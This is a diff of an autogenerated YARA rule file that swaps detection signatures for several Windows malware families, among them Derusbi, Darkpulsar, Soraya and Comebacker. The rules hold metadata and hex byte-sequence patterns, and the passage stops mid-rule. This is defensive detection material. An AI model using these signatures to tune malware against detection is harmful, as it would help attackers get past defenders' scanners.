 		license_url = "N/A"
-		logic_hash = "d9d1b63e76728813771527a0e75abb334c604ad0cc64db1ac03a90b90d9454be"
+		logic_hash = "1f557e82713be82d4effefb67945984b55368207555daca9d42390f29b2b045a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134604,32 +135167,32 @@ rule MALPEDIA_Win_Defray_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894704 8b45fc 8d0483 894708 }
-		$sequence_1 = { ab ab 66ab 33c0 8dbdb4faffff a5 a5 }
-		$sequence_2 = { f78580cfffff00040000 0f85c0030000 8d85c0fdffff 50 ff15???????? 83f8ff }
-		$sequence_3 = { 33c0 897dee 668945ec 66897df2 6a03 6a20 6a03 }
-		$sequence_4 = { 8d95a4f5ffff 8d8da4fdffff e8???????? 85c0 0f8e32010000 68ca050000 8d95a4f5ffff }
-		$sequence_5 = { 8bf0 33ff b9???????? 8d85accfffff 668b10 663b11 7523 }
-		$sequence_6 = { a1???????? 33c5 50 8d45f4 64a300000000 eb24 8b048d00eb4800 }
-		$sequence_7 = { 99 f7ff 8b7d08 8bd0 3bfa 766c b950077500 }
-		$sequence_8 = { a1???????? 8d9598f9ffff 8907 8bf2 668b02 83c202 663bc1 }
-		$sequence_9 = { ba05000000 8d0da0564700 e9???????? a90000f07f 752c a9ffff0f00 7525 }
+		$sequence_0 = { 40 ebea ff75f4 889c0574ffffff 8d8574ffffff 50 6a01 }
+		$sequence_1 = { 59 50 ffd6 8bd8 8b450c 6a00 }
+		$sequence_2 = { 8d85ecfdffff 59 57 50 ff15???????? }
+		$sequence_3 = { 57 56 68???????? ff7508 6a50 68???????? e8???????? }
+		$sequence_4 = { c68548ffffff0f c68549ffffff10 c6854affffff11 c6854bffffff12 c6854cffffff13 c6854dffffff14 }
+		$sequence_5 = { 59 85c0 59 7576 a0???????? 6a7f 888580fdffff }
+		$sequence_6 = { 888580fdffff 59 33c0 8dbd81fdffff }
+		$sequence_7 = { ff35???????? e8???????? 2b35???????? 83c40c 3bf3 7f1a 391d???????? }
+		$sequence_8 = { c3 55 8bec b808200000 e8???????? 53 56 }
+		$sequence_9 = { 85c0 742b 53 ff15???????? 50 }
 
 	condition:
-		7 of them and filesize < 1253376
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Vendetta_Auto : FILE
+rule MALPEDIA_Win_Glooxmail_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "966ae160-05eb-53d3-b86d-ed42268f2f0c"
+		id = "c8b40bc0-2701-5e85-b527-dfec9c8227da"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vendetta_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glooxmail_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "4fce9b15fe513b7322e530a7cc2cb9b1afb7d5162c1238338f15db6a45fbd5fd"
+		logic_hash = "0702baea6e45ee40dbbd470cae1ae641eba3358089995e7fe66a20e43c2df933"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134643,32 +135206,32 @@ rule MALPEDIA_Win_Vendetta_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b04c5e06f4100 5d c3 33c0 5d }
-		$sequence_1 = { 83c408 84c0 0f845d010000 6a00 51 0bf9 }
-		$sequence_2 = { 660f2815???????? f20f59db 660f282d???????? 660f59f5 660f28aa30914100 }
-		$sequence_3 = { 83a500fcffff00 51 8d8df8fbffff e8???????? 898500fcffff }
-		$sequence_4 = { 8b4508 dd00 ebc6 c745e0d8924100 e9???????? c745e0e0924100 }
-		$sequence_5 = { 6a30 eb27 3bcb 7f0e 7c08 81fa0000800c 7704 }
-		$sequence_6 = { 7309 8b04c5e06f4100 5d c3 33c0 5d c3 }
-		$sequence_7 = { 85c0 7433 8bce e8???????? 8bf8 }
-		$sequence_8 = { 33c9 8bc1 3914c5b89b4100 7408 40 83f81d 7cf1 }
-		$sequence_9 = { 53 8d85f0f7ffff 50 56 }
+		$sequence_0 = { 8d4dd8 e8???????? 8d45a0 50 8d45d8 c745fc17000000 814d5c00020000 }
+		$sequence_1 = { 3bc3 744a 68???????? 8d8c24f0010000 e8???????? 8b442418 c684246004000020 }
+		$sequence_2 = { e8???????? c68424a000000003 68???????? 8d4c2428 895c2418 e8???????? 57 }
+		$sequence_3 = { 5e c20400 6a3c b8???????? e8???????? 8b7508 8d4604 }
+		$sequence_4 = { e8???????? 8b874c010000 83c40c 8d4dd4 3945e8 760a }
+		$sequence_5 = { 8b4604 80b89417450000 7f15 56 e8???????? }
+		$sequence_6 = { 7405 e8???????? 3974241c 746a 807f7c00 742c 83ec1c }
+		$sequence_7 = { bf???????? 57 8d8d24ffffff e8???????? 68???????? 8d8d5cffffff c745fc0b000000 }
+		$sequence_8 = { 8bc7 e8???????? 59 84c0 7414 8b4e04 85c9 }
+		$sequence_9 = { e8???????? 807def00 740f c783a000000002000000 e9???????? 68???????? 8d4da4 }
 
 	condition:
-		7 of them and filesize < 296960
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Derusbi_Auto : FILE
+rule MALPEDIA_Win_Ondritols_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c096fedf-ff02-5515-aa84-dda61fd1b242"
+		id = "4bdd5e11-901a-5fdb-be76-3d7bad7b15da"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.derusbi_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ondritols"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ondritols_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "caf9d1cd989612f714b35d25a26a8b4ab8e67beec50b5a767b0d4e5f975c75e0"
+		logic_hash = "31bdba3ae2c3b90f1c45acd89ae6f07099ae537657a6493ddb8dcbc12190c75b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134682,34 +135245,34 @@ rule MALPEDIA_Win_Derusbi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 48 48 7436 48 742c }
-		$sequence_1 = { ffb5f4fbffff ffd6 85c0 7461 b800010000 8985e4fbffff 8985e8fbffff }
-		$sequence_2 = { 53 be???????? 8dbda8f1ffff 50 f3a5 e8???????? 899d28f2ffff }
-		$sequence_3 = { 8b800c010000 c3 83790405 750e 83790800 7408 8b81a0000000 }
-		$sequence_4 = { 89442434 e8???????? 39442434 7467 68a4000000 ff15???????? 8bf0 }
-		$sequence_5 = { 8d85b4fdffff 53 50 c685fcfeffff00 c6857cffffff00 c6857cfeffff00 ffd6 }
-		$sequence_6 = { 51 ffb5dcf9ffff 8d85f4fdffff 50 ff15???????? 33c0 }
-		$sequence_7 = { 8db405aff7ffff 68???????? 56 ff15???????? 56 ffd7 8b8d9cf3ffff }
-		$sequence_8 = { 50 ff15???????? 59 59 6a43 58 6689442414 }
-		$sequence_9 = { 50 ff15???????? c70424???????? 33f6 56 6801001f00 ff15???????? }
+		$sequence_0 = { 8b4de0 0b0d???????? 894de0 8b550c 83c201 89550c 8b450c }
+		$sequence_1 = { 8b4d08 e8???????? 85c0 7514 3bf7 7309 5f }
+		$sequence_2 = { e8???????? 83c410 c644241301 3bd8 7505 c644241300 }
+		$sequence_3 = { 0fbe11 83fa5d 7513 8d45d4 50 8b4de8 }
+		$sequence_4 = { 85c0 0f8493000000 6853040000 68???????? 8b45e0 50 e8???????? }
+		$sequence_5 = { 68???????? e8???????? 2bc1 8b4d10 3bc1 7305 894510 }
+		$sequence_6 = { 8b5d08 56 8bf1 8b4614 83c9ff 2bc8 3bcb }
+		$sequence_7 = { 8b4dec e8???????? 898594feffff 8b8d94feffff 898d90feffff c645fc02 8b8d90feffff }
+		$sequence_8 = { 83e01f c1e006 8b0c95e0ca4600 833c08ff 7468 833d????????01 753c }
+		$sequence_9 = { 8d8d1fffffff 51 8b4d08 e8???????? 50 8b4de8 e8???????? }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 964608
 }
-rule MALPEDIA_Win_Darkpulsar_Auto : FILE
+rule MALPEDIA_Win_Neteagle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3c0e62f1-e08c-54de-80e8-3035c44da66d"
+		id = "552fea63-ea2d-5d68-acbe-acbcf4f3fc62"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkpulsar_auto.yar#L1-L471"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neteagle_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "a16686b6fd6dac730451b9eb62e01c34a4e8ab3b1c781a91de53e419e5302dea"
+		logic_hash = "d61d147c710715632ec1c821209ba30c6e6f1ac5fd2be9819dd093a236f5d3aa"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134721,73 +135284,32 @@ rule MALPEDIA_Win_Darkpulsar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 40 c20c00 68???????? 64ff3500000000 8b442410 896c2410 }
-		$sequence_1 = { c21000 ff25???????? ff25???????? ff25???????? 33c0 }
-		$sequence_2 = { 3a01 1bc0 83e0fe 40 5f 5e }
-		$sequence_3 = { 59 3bd8 74e0 0fb607 8b4d0c 3a01 }
-		$sequence_4 = { 50 ffd6 8bd8 8b450c 0fbe00 50 ffd6 }
-		$sequence_5 = { 803f00 742e 47 ff450c 0fbe07 }
-		$sequence_6 = { 50 ffd6 59 59 3bd8 74e0 }
-		$sequence_7 = { 56 8b35???????? 57 8b7d08 eb09 }
-		$sequence_8 = { 8b5d10 56 8b7508 33d2 }
-		$sequence_9 = { e8???????? 59 85c0 7625 }
-		$sequence_10 = { 33c0 eb03 83c8ff 5f 5e c3 56 }
-		$sequence_11 = { 8bd8 53 e8???????? 83c410 85c0 750c }
-		$sequence_12 = { 59 5e 8b45fc c9 }
-		$sequence_13 = { 8d4601 6a01 50 ff15???????? 8bf8 }
-		$sequence_14 = { 8d45cc 50 57 e8???????? 83c410 85c0 }
-		$sequence_15 = { 1bc0 59 40 c3 e9???????? }
-		$sequence_16 = { 5e c9 c3 56 8b742408 85f6 7412 }
-		$sequence_17 = { e8???????? 8bf0 46 56 ff15???????? 59 }
-		$sequence_18 = { 50 ff7618 ff15???????? 59 59 85c0 }
-		$sequence_19 = { 53 33d2 56 57 33c0 }
-		$sequence_20 = { 5f 5e c3 8b442404 85c0 7503 }
-		$sequence_21 = { 56 e8???????? ff742414 50 e8???????? }
-		$sequence_22 = { ff75fc ff75f4 e8???????? 59 59 83f8ff }
-		$sequence_23 = { 83c410 83f8ff 0f95c1 49 }
-		$sequence_24 = { 33d2 c3 8bff 55 8bec b863736de0 394508 }
-		$sequence_25 = { ffd7 59 5f 5e c3 8b4c2404 85c9 }
-		$sequence_26 = { e8???????? 59 5e 83f8ff }
-		$sequence_27 = { 6a01 ff15???????? 8bf0 59 59 3bf7 }
-		$sequence_28 = { 8b4514 893e 897e04 894608 c7460c7f000000 }
-		$sequence_29 = { 8d45f0 50 ff758c e8???????? 0fb606 }
-		$sequence_30 = { 00db 7313 752f 3b742404 0f830b010000 }
-		$sequence_31 = { 58 8b542408 85d2 7407 }
-		$sequence_32 = { 8b4d14 57 894628 894e08 e8???????? }
-		$sequence_33 = { 740a b8???????? e9???????? 56 be3412cdab }
-		$sequence_34 = { 52 ff5640 85c0 0f8464010000 8b8690000000 }
-		$sequence_35 = { 83f8ff 7446 8d85d8feffff 50 57 e8???????? }
-		$sequence_36 = { 6a03 50 e8???????? 83c414 eb19 8b570c }
-		$sequence_37 = { 83c40c 85c0 7409 83f8fc 0f85af000000 8b45e8 }
-		$sequence_38 = { e8???????? 83c40c c3 8b542404 8b4c2408 56 }
-		$sequence_39 = { 00db 7313 75e1 3b742404 0f8318010000 }
-		$sequence_40 = { c1ee08 8b75fc 885001 8bd1 0facf210 c1ee10 885002 }
-		$sequence_41 = { 00db 73e1 7511 3b742404 }
-		$sequence_42 = { 8975f8 8975e8 8975d0 8975dc }
-		$sequence_43 = { 00db 7309 75f4 8a1e 46 10db }
-		$sequence_44 = { 8b35???????? 33db 53 6a04 8d45dc 50 57 }
-		$sequence_45 = { 50 ff7508 ff15???????? 83f8ff 741f 56 }
-		$sequence_46 = { 8bf0 59 59 85f6 7423 ff75f0 }
-		$sequence_47 = { 33c0 83c008 57 8b7d10 50 8907 894704 }
-		$sequence_48 = { 50 52 ff5624 85c0 0f84d2010000 31c0 50 }
-		$sequence_49 = { 660fb64901 66c1e008 660bc1 c3 }
-		$sequence_50 = { 51 d91c24 e8???????? 50 e8???????? d905???????? }
+		$sequence_0 = { 57 6a00 ff15???????? 8b44241c 8d4c2424 6a00 51 }
+		$sequence_1 = { 8d4dec e9???????? 8d4dd8 e9???????? 8b45e4 50 }
+		$sequence_2 = { 8b4678 8b3d???????? 50 8b4620 6a01 6880000000 }
+		$sequence_3 = { 50 6a00 6880000000 51 ffd7 6a01 6a00 }
+		$sequence_4 = { c684241c02000002 8b70f8 81fe00010000 7e1d 8bb42424020000 }
+		$sequence_5 = { 52 50 ffd5 6a07 8d8c2428010000 68???????? }
+		$sequence_6 = { e8???????? 8d4c2420 c644243c01 e8???????? 8b442414 bf???????? 8a10 }
+		$sequence_7 = { 8d4c2418 c644245801 e8???????? 8d4c2434 e8???????? 8d542464 }
+		$sequence_8 = { 52 8944244c e8???????? 8d4c2414 c644243803 e8???????? }
+		$sequence_9 = { 8964242c 51 8d4c2434 e8???????? 8d542428 8bce 52 }
 
 	condition:
-		7 of them and filesize < 491520
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Fuxsocy_Auto : FILE
+rule MALPEDIA_Win_Comebacker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9b163b74-81fa-5d1f-8fcc-0d3d39882b0f"
+		id = "19b11e1a-a1ff-5098-8869-502d6ab34aa7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fuxsocy_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.comebacker_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "7f8e495acd118755a8b2612e1d92bc28ab4a40bb2e7047fd4133b89e103973ef"
+		logic_hash = "e448a9fe85529eabd811145723dc68a4c09b7b0e6109ed9890120aa2245173a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134801,34 +135323,39 @@ rule MALPEDIA_Win_Fuxsocy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7c2410 eb0b 8a03 8807 47 }
-		$sequence_1 = { 83c40c c3 83ec0c 33d2 53 55 }
-		$sequence_2 = { 8bcf e8???????? 59 59 ff742434 88442417 53 }
-		$sequence_3 = { e8???????? 8b4c2410 8bf0 33c0 50 50 }
-		$sequence_4 = { 53 ff15???????? 55 6a00 ff15???????? 5f 5e }
-		$sequence_5 = { c744246804000000 894c2464 894c2450 ff15???????? 85c0 }
-		$sequence_6 = { 8d8c2468020000 e8???????? 59 84c0 0f8462010000 55 6850020000 }
-		$sequence_7 = { 8975e4 85f6 7426 8365fc00 57 53 }
-		$sequence_8 = { 8b442410 5e 5d 8901 8b44240c 5b }
-		$sequence_9 = { c20400 83ec18 56 89542414 66894c2406 e8???????? 8bf0 }
+		$sequence_0 = { 6683f809 7f04 0430 eb02 }
+		$sequence_1 = { 4c8d0556b10300 41b9dc000000 8d4af2 e8???????? }
+		$sequence_2 = { 741e 488bce 488bc6 488d15bf350600 83e11f 48c1f805 }
+		$sequence_3 = { 493b16 7429 c744242074010000 babb000000 4c8d0df6e20300 }
+		$sequence_4 = { 668945dd 8845df 66899d20060000 e8???????? }
+		$sequence_5 = { 488b742478 48895c2468 4c8bc8 488b842408010000 4889442460 8b8424f8000000 }
+		$sequence_6 = { eb22 c7442420ff000000 41b868000000 ba77000000 4c8d0d79f50300 }
+		$sequence_7 = { f2ae 48f7d1 488d79ff 488b8c24e0000000 }
+		$sequence_8 = { 83ec44 a1???????? 33c5 8945fc 8b4508 8d55dc }
+		$sequence_9 = { 7409 8d04c516d70410 eb23 f6c30c 7409 8d04c514d70410 }
+		$sequence_10 = { e8???????? 83c408 8945f8 8b4514 85c0 7416 8d4dec }
+		$sequence_11 = { 42 52 56 50 a3???????? }
+		$sequence_12 = { 81e7ff000000 8b1cbd38580410 33cb 8b5e08 33cb 33db 8ade }
+		$sequence_13 = { 2bc2 6a21 a3???????? e8???????? 83c404 8bf8 33f6 }
+		$sequence_14 = { 8d95fcf7ffff 68???????? 52 ffd7 8d85fcf7ffff 83c408 8d5002 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 1429504
 }
-rule MALPEDIA_Win_Soraya_Auto : FILE
+rule MALPEDIA_Win_Waterminer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c1b5e4fb-ecf1-56e9-b7ee-f112f17e5f08"
+		id = "015d17f9-270a-5ff3-ae6a-8c2f19540faa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.soraya_auto.yar#L1-L234"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.waterminer_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "9c021471b4a00823554f7973fdcdc5043a2447611e50ed019058643f5ab74f68"
+		logic_hash = "fee2af94ed2d9b29403d90ebf96331b0858215bab4f3b7310fc1b1dc42373d50"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134840,45 +135367,38 @@ rule MALPEDIA_Win_Soraya_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8d48bf 80f919 77f2 }
-		$sequence_1 = { 4885c0 0f84cb000000 448d432f 488d157bf3ffff 4d8bcd 488bc8 4489642420 }
-		$sequence_2 = { ff55d4 8b4dfc 33cb 2bcf 3bc8 }
-		$sequence_3 = { 83c40c 894510 85ff 743c 81ff88130000 7334 813b504f5354 }
-		$sequence_4 = { 037d0c 3bc7 72cb 8b7d10 33f9 }
-		$sequence_5 = { 7522 448d4b04 ff15???????? 488b4c2430 4c8d442430 }
-		$sequence_6 = { 8b4d94 33c6 2bc3 33c1 a900100000 }
-		$sequence_7 = { 488bcb ff15???????? 488d4dd0 ff15???????? 488b0d???????? 488364242000 488d5150 }
-		$sequence_8 = { f7f9 0fb6c2 d1e8 c21000 55 8bec }
-		$sequence_9 = { 897dfc 8b07 03c3 50 ff55f0 }
-		$sequence_10 = { c3 b401 c3 e8???????? }
-		$sequence_11 = { 49ffc0 413bd2 72db 418bd6 3bcb 72c8 4c891d???????? }
-		$sequence_12 = { 498d4e40 4d2bc6 0fb701 6641398408a0010000 7530 ffc2 }
-		$sequence_13 = { 0f8577ffffff 33c0 5f 5e 5b c9 }
-		$sequence_14 = { 8365f800 8365fc00 8d42b1 85c0 746c 53 56 }
-		$sequence_15 = { 8d45d8 50 e8???????? 8b45fc 8b4df4 }
-		$sequence_16 = { 0f8573020000 8b5d1c 837d3000 7502 8bdf 8b7d2c a1???????? }
-		$sequence_17 = { 4c03eb 448be6 4803c2 48898424c8020000 39741d18 }
-		$sequence_18 = { 8b4dd4 894dd0 8b4dd8 894dd4 }
-		$sequence_19 = { 85c0 750b ff75fc ff15???????? eb1d 33c0 }
-		$sequence_20 = { 488bd6 498bcf ff15???????? 488bcd e9???????? 8b543050 486344323c }
-		$sequence_21 = { 40 eb05 c1d30b 33c0 5f 5e }
-		$sequence_22 = { 8d0c8b 66397102 7537 0fb709 bf1f600000 }
+		$sequence_0 = { 03bc24a8000000 488bcd 4c8d0d35cb0300 83e13f }
+		$sequence_1 = { 46 007e9f 46 0000 07 }
+		$sequence_2 = { 8b5508 3b14cd88c04900 750c 8b45fc 8b04c58cc04900 eb04 }
+		$sequence_3 = { 00ed ac 45 00fc ac 45 }
+		$sequence_4 = { 02d0 49ffc3 418d4001 881418 }
+		$sequence_5 = { 8b55e0 8b450c 8b75e0 668b8c7154074b00 66894c500c }
+		$sequence_6 = { 0344240c 4403d0 428b4405e7 418bd2 }
+		$sequence_7 = { 8b5508 c1fa05 8b4508 83e01f c1e006 8b0c95c02b4b00 837c013800 }
+		$sequence_8 = { 0fb69144314800 ff249538314800 c745c806000000 eb22 8b45cc 83e801 8945cc }
+		$sequence_9 = { 03c1 03d0 488d051e580500 418b0400 }
+		$sequence_10 = { 6bc01c 8b8880434b00 330d???????? 894dfc 740c }
+		$sequence_11 = { 8b5508 83e21f c1e206 8b048dc02b4b00 833c10ff }
+		$sequence_12 = { 03c0 2bc8 0f84ec040000 8d41ff 8b848288d20600 }
+		$sequence_13 = { 02c8 41880c18 418a03 240f }
+		$sequence_14 = { 03442410 4403e8 428b4405e7 418bd5 }
+		$sequence_15 = { 0344240c 4403d0 488d051a560500 418b0400 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 1556480
 }
-rule MALPEDIA_Win_Hacksfase_Auto : FILE
+rule MALPEDIA_Win_Blackcoffee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e8964081-a2ab-5f17-84d6-f60be8a25bb6"
+		id = "4f36c9cd-a889-561b-ae61-a577c98570f5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hacksfase_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackcoffee_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "e471c3c94524d0ea367845eb4bddab6e1e071bddbe6451c868738ead26f24319"
+		logic_hash = "0bd95226ab3597279ec9c63042069446fb610a5d850507e2f23654627aa44494"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134892,32 +135412,32 @@ rule MALPEDIA_Win_Hacksfase_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5e c9 c20400 b8???????? e8???????? 83ec40 }
-		$sequence_1 = { 895dd0 ff5064 3bc3 894508 7d5d 3d17030980 7456 }
-		$sequence_2 = { ff15???????? 83c418 5f 5e 81c434010000 }
-		$sequence_3 = { 8bfe f3ab 8d7e40 6a04 68???????? 57 }
-		$sequence_4 = { 50 e8???????? ff15???????? 834dfcff 59 8d4d94 e8???????? }
-		$sequence_5 = { c20400 56 8bf1 807e1c00 740d 8b460c }
-		$sequence_6 = { 8945e8 59 3bc3 c645fc03 7422 53 8d450b }
-		$sequence_7 = { 0bc6 85d2 7502 0c04 6a00 50 ff15???????? }
-		$sequence_8 = { 57 8bd9 6a02 5f 8d4dd4 }
-		$sequence_9 = { 5e 5b 5d c20c00 ff25???????? ff25???????? 56 }
+		$sequence_0 = { ff15???????? 89460c eb03 897e0c 53 ff15???????? 8bc6 }
+		$sequence_1 = { ff75b8 e8???????? 89460c ff15???????? 894610 8d8534ffffff }
+		$sequence_2 = { 57 8bf0 ff7508 8d450c 50 8d4604 50 }
+		$sequence_3 = { f3ab 8d8568ffffff 33f6 50 c745fc04010000 c78568ffffff94000000 }
+		$sequence_4 = { 6a1c 6a40 aa ff15???????? 8bf0 8b4508 }
+		$sequence_5 = { 8bec 81ec08020000 80a5f8feffff00 57 }
+		$sequence_6 = { 59 8b35???????? 59 bf000000a0 57 }
+		$sequence_7 = { 8d4628 50 ffd3 8b45f4 }
+		$sequence_8 = { 8955f8 ff750c 6a00 ff15???????? 85c0 5f 741d }
+		$sequence_9 = { 8365fc00 83c010 6a04 50 8d45fc 50 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 118784
 }
-rule MALPEDIA_Win_Soundbite_Auto : FILE
+rule MALPEDIA_Win_Roopirs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "70cdb19a-d0a2-5f5f-a69b-31680210f3d2"
+		id = "57676d4c-d0d7-5b4f-80a4-819b4d474425"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.soundbite_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roopirs_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "d07ea48c839908887a0a5f9ab78be91fc08852ce51b809ff0c620d5b56719109"
+		logic_hash = "d4e144778ab9b98b475c3cbfeb400528a9373556893774f62bba1f2eb8f36265"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134931,32 +135451,32 @@ rule MALPEDIA_Win_Soundbite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { bb???????? e8???????? e8???????? 68???????? ff15???????? 33c0 50 }
-		$sequence_1 = { 8d45f4 64a300000000 c745fc00000000 8b4518 }
-		$sequence_2 = { 8b5714 895614 8b5718 895618 8b571c 89561c 8b5720 }
-		$sequence_3 = { 8b4510 3bf3 7457 57 }
-		$sequence_4 = { 6683bc8e7e0a000000 7533 0fb690614f4200 6683bc967e0a000000 7530 83e804 83f803 }
-		$sequence_5 = { c645fc0a 8bbdf8fcffff 3bcb 0f83c9000000 8bd6 3bfa }
-		$sequence_6 = { 3bc1 0f87200a0000 ff2485f1ad4100 33c0 838de8fdffffff 89858cfdffff 8985a4fdffff }
-		$sequence_7 = { 899d04ffffff c685f4feffff00 8d5001 8d642400 }
-		$sequence_8 = { 8d1491 8b0c02 03c8 8b75e0 8b55f4 890c16 85c9 }
-		$sequence_9 = { e9???????? b830750000 85db 7e09 57 e8???????? 83c404 }
+		$sequence_0 = { c745fc47000000 8b4dd8 51 68???????? ff15???????? 8945c0 }
+		$sequence_1 = { 50 ff15???????? 898530ffffff eb0a c78530ffffff00000000 33c9 837da800 }
+		$sequence_2 = { ff15???????? 8d4db0 ff15???????? c745fc07000000 833d????????00 751c 68???????? }
+		$sequence_3 = { 8945b0 837db000 7d1d 6a20 68???????? 8b45dc 50 }
+		$sequence_4 = { 8d55d4 52 6a05 ff15???????? 83c418 8d45bc 50 }
+		$sequence_5 = { 8b02 8b4d80 51 ff5014 dbe2 89857cffffff }
+		$sequence_6 = { 8b4508 50 8b08 ff5104 8b5514 56 8d45bc }
+		$sequence_7 = { c78544ffffff00000000 8b45ac 89458c 8d4dcc 51 8b558c }
+		$sequence_8 = { 68???????? 68???????? ff15???????? c78548ffffffd4624000 eb0a }
+		$sequence_9 = { 8d4dc8 ff15???????? c745fc07000000 8b4dd8 51 68???????? }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Gemcutter_Auto : FILE
+rule MALPEDIA_Win_Megumin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f2a59f86-1075-5464-b91b-cb447c183566"
+		id = "37ab0bcc-cdac-5d31-a456-2de10ec33215"
 		date = "2024-10-31"
 		modified = "2024-11-11"
